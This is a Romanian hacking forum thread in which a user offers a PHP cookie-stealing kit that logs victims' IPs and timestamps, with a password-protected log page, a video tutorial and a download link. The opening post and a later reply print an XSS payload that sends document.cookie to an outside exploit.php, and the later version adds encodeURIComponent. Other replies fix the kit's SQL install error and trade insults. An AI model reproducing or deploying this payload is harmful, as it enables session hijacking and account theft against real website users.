shadowSQLi Posted March 22, 2015 Report Posted March 22, 2015 (edited) am terminat de lucrat la el.Ce contine el/cu ce ne ajuta?-Furtul de cookies-IP Victim-Data curenta cand s-a furat cookieurile-Securizat-Are parola la pagina de logs log.php este "shadow"#Vector XSS: <script>a=new Image();a.src="http://sitetau.com/exploit.php?cookie="+document.cookie;</script> la inceputul videoclipului aveti tutorialul de configurare si la sfarsit un test sa vedeti cum functioneaza.#Video: https://vid.me/OckG#Download: Zippyshare.com - s2.rar Edited March 22, 2015 by shadowSQLi Quote
askwrite Posted March 22, 2015 Report Posted March 22, 2015 (edited) Tot ce-ai facut tu acolo e un mare cacat, bine-nteles copy pasteuit, ai recunoscut.1. In post specifici ca parola e rstforums dar2. In install.php trebuie sa completezi cu user,pw,db etc dar mai jos vezimysql_select_db( 'a3797662_shadow' );3. In install.php ai$sql = "CREATE TABLE data2 (...........dar tu in exploit.php si config.php ai tabelul data (in video vad ca ne pui pe noi sa modificam din data2 in data, lol????????????)4. Codul arata ca o pula, esti analfabet, tot ce-ai "facut tu" e un mare cacat.//Edit: @shadowSQLi cine a zis ca nu am inteles? e vorba ca ne pui pe noi sa modificam cand tu puteai sa pui direct scriptul cum trebuie. si chiar nu ma intereseaza ca esti incepator sau nu, odata ce te apuci sa faci ceva, il faci functional din toate punctele de vedere, mai ceri ajutorul altcuiva etc etc si cand gresesti nu incepi si injuri, accepti ca ai gresit, rezolvi si gata Edited March 22, 2015 by askwrite Quote
shadowSQLi Posted March 22, 2015 Author Report Posted March 22, 2015 (edited) Tot ce-ai facut tu acolo e un mare cacat, bine-nteles copy paste-uit, ai si recunoscut.1. In post specifici ca parola e rstforums dar2. In install.php trebuie sa completezi cu user,pw,db etc dar mai jos vezi3. In install.php aidar tu in exploit.php si config.php ai tabelul data (in video vad ca ne pui pe noi sa modificam din data2 in data, lol????????????)4. Codul arata ca o pula, in concluzie e un mare cacat.// @askwrite mai taci in plm..sunt incepator si nu am copiat nimic doar conexiunea mysql si asta vine $servername $user $pass si verificarea de conexiune Si faza care ai zis tu daca nu erai autist, intelegeai din videoclip ce trebuie modificat Edited March 22, 2015 by shadowSQLi Quote
Nytro Posted March 22, 2015 Report Posted March 22, 2015 Asa inveti, incercand si acceptand critici. Continua. Quote
webstar92 Posted March 26, 2015 Report Posted March 26, 2015 (edited) Cand deschid install.phpConnected successfullyCould not create table: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'TYPE=MyISAM AUTO_INCREMENT=2' at line 6 Edited March 26, 2015 by webstar92 Quote
Guest CM3D Posted March 26, 2015 Report Posted March 26, 2015 Cand deschid install.phpConnected successfullyCould not create table: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'TYPE=MyISAM AUTO_INCREMENT=2' at line 6Schimba "TYPE=MyISAM AUTO_INCREMENT=2" in "ENGINE=MyISAM AUTO_INCREMENT=2" Quote
Kalashnikov. Posted March 26, 2015 Report Posted March 26, 2015 // @askwrite mai taci in plm..sunt incepator si nu am copiat nimic doar conexiunea mysql si asta vine $servername $user $pass si verificarea de conexiune Si faza care ai zis tu daca nu erai autist, intelegeai din videoclip ce trebuie modificatIn orice domeniu daca vrei sa fii bun trebuie sa cauti critice nu laude !! Quote
TheTime Posted March 26, 2015 Report Posted March 26, 2015 <script>a=new Image();a.src="http://sitetau.com/exploit.php?cookie="+document.cookie;</script>ar trebui shimbat in <script>a=new Image();a.src="http://sitetau.com/exploit.php?cookie="+encodeURIComponent(document.cookie);</script> Quote
kNigHt Posted March 26, 2015 Report Posted March 26, 2015 Daca vrei sa inveti si esti interesat, ia d-aci:http://www74.zippyshare.com/v/OR8HnDQ7/file.htmlTi-am cosmetizaat putin scriptul cu ceva good practices. Insista pe PDO, mysql_query e mort Daca ai rabdare si nu esti foarte insistent, poti sa ma intrebi ce nu intelegi.Spor Quote